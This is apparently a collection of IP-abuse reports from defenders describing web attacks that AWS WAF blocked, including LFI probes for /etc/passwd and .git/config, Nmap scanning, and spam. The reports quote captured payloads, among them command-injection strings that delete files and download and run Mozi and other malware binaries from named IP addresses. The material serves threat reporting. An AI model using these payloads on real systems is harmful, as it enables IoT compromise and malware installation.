Because this IP is getting blacklisted, legitimate emails to us from Nanobanc sending through that server are being rejected due to the spam score :(

Sending spam emails saying to download photos from this domain http://txsdue.dyoobomyf.com/redactedID

Observed repeated directory traversal attempts targeting /etc/passwd using multiple URL-encoded path variants. Activity appears automated and consistent with web application exploitation scanning. Requests were blocked by AWS WAF (AWSManagedRulesCommonRuleSet) over 80,000 times yesterday.

Blocked by AWS WAF. IP attempted Local File Inclusion (LFI) via query string:
GET /images/styles.php?toroot=/etc/passwd%00
Matched AWSManagedRulesLinuxRuleSet - LFI_QUERYSTRING.
Clear attempt to read /etc/passwd on a Linux host.

Blocked GET request to /setup.cgi with query parameters designed for command injection (rm -rf /tmp/*; wget http://177.163.253.32:58348/Mozi.m -O /tmp/netgear; sh netgear). The URL parameters (including netgear.cfg) suggest an attempt to compromise a Netgear or similar IoT device. The attack appears to be part of an automated web application attack/hacking attempt targeting IoT vulnerabilities, and was blocked by AWS WAF using managed rules.

Blocked multiple times by AWS WAF Managed Ruleset. Detected as Bad Bot using Nmap Scripting Engine. User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html). Targeted paths: /nmaplowercheck, /sdk, /HNAP1.

The IP 223.158.137.224 attempted to access a restricted backup file (`joomla.bak`), which is a **common reconnaissance technique** used to locate exposed Joomla CMS configuration backups.
The request was **blocked by AWS WAF** under the **"RestrictedExtensions_URIPATH"** rule, confirming it as a **malicious scan**. The IP was also rate-limited, suggesting it is engaging in automated probing.
This activity is **consistent with hacking attempts** looking for misconfigured servers with exposed backups.

This IP (185.121.15.223) is actively hosting **malicious scripts** used in Remote File Inclusion (RFI) attacks. Attackers are sending payloads that download and execute files from this IP, such as:
cmd=cd /tmp; rm nshkarm7; wget http://185.121.15.223/nshkarm7; chmod 777 *; ./nshkarm7 tbk
This indicates that the server at this IP is being used for **malware distribution**, likely to install backdoors or other harmful software on targeted systems. The activity was detected and blocked by AWS WAF under the **GenericRFI_QUERYARGUMENTS** rule. This IP should be blacklisted to prevent further abuse.

The IP has been blocked multiple times by AWS WAF for attempting Local File Inclusion (LFI) attacks. The requests targeted various paths using directory traversal techniques, such as:
- `/img../.git/config`
- `/js../.git/config`
- `/static../.git/config`
- `/events../.git/config`
- `/css../.git/config`
- `/assets../.git/config`
- `/images../.git/config`
- `/content../.git/config`
- `/media../.git/config`
These requests indicate an attempt to exploit misconfigured servers to access `.git/config` files, which can contain sensitive repository metadata. The activity was blocked under the AWS WAF Managed Core Rule Set (`GenericLFI_URIPATH`).
This behavior is consistent with automated scanning for vulnerable directories and is considered malicious.

This IP has been flagged by AWS WAF for multiple attempts to perform Local File Inclusion (LFI) attacks. The requests specifically targeted paths like `/lib../.git/config`, `/images../.git/config`, and `/media../.git/config`. These attempts were blocked under the AWS WAF Managed Core Rule Set for LFI URI Path. The malicious actor is likely trying to access sensitive configuration files using directory traversal techniques. These repeated requests originated from different user agents, indicating possible automation or a malicious bot.